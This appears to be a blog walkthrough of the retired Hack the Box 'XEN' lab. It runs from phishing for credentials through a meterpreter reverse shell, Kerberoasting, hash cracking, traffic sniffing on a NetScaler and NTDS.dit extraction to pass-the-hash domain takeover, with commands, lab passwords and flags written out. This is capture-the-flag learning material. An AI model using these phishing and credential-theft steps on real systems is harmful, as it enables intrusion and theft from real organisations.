Hack the Box – XEN ( retired june 2020 )

1st I add the IP of the machine to /etc/hosts as xen.htb


As always we start with a nmap scan

E:\PENTEST>nmap -A -oN htb-endgame-xen
Starting Nmap 7.70 ( ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for (
Host is up (0.024s latency).
Not shown: 997 filtered ports
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| sequence of commands
| sequence of commands
| Hello:
| EHLO Invalid domain address.
| Help:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject:
| Subject Alternative Name:
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
1 24.00 ms
2 24.00 ms (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds


It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt

Web Directories

We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.

Opening the, I get the following.

And browsing, I got the following.

I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D -t

I had found 4 addresses;


Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects.  I eventually got a hit with the subject of Remote.  My thoughts on this was to try and get the users to click on my link.  My thoughts were as follows;

telnet 25 helo



DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to Regards


I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users

pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan

And I now had access to a desktop.

I tried this for each user that I had and each of the worked and successfully logged in.

I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali

Once I had click ok, I was presented with a Desktop.  I browsed to the Desktop of the user and I was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them.  I first made a note off all the users and desktops they were assigned to

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=10086 -f exe x86exploit.exe

I then proceeded to setup m msfconsole as follows.


Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network, I saw the internal network as, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IP’s of the desktops, I chose to only scan a small range.  I wanted to scan between 199 and 210.

I managed to get an additional 3 IP’s.

  • (DC)
  • (Citrix)
  • (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir

Directory: C:\Users\pmorgan\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we us]
PS C:\Users\pmorgan\Desktop> type cmd.cmd

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this token to a file named mturner so that I could now run this through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at

hashcat  -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find.  I eventually found SMB on and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H

This showed that we had access to read the files locate in the Citrix$ folder.  I connected to this to see what was inside the folder with smbclient tools.

proxychains smbclient \\\\\\Citrix$ -U htb.local

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these file and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in putty but has a password on it too.  I needed to try and crack the password on this before I could proceed.  I decided to convert this with putty2john. putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route


Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash

Now that I knew the password for the file, I could now convert the file for use with my system.  To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found the default username of the devices is nsroot.  I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at

I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”


4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage


Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it.  The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@ .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 1
msf exploit
root@kali:~/htb/xen# proxychains -request -dc-ip HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H
ProxyChains-3.1 (
[+] Finding open SMB ports....
[+] User SMB session establishd on
[+] IP: Name: 
Disk Permissions
---- -----------
root@kali:~/xen# proxychains smbclient \\\\\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (
WARNING: The "syslog" option is deprecated
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available


The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password.  These essentially shared the same password.  This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb


root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger


Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin.  However, I then found an article which covered doing this with diskshadow.  This was highlighted in the following document.

Hackinparis2019/blob/master/whoamiprivParis_Split.pdf.  I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.

portfwd add -l 3389 -r -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v: /u:backup-svc 
ProxyChains-3.1 (
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the backup, I restore this by importing the  modules found at ug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/ -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *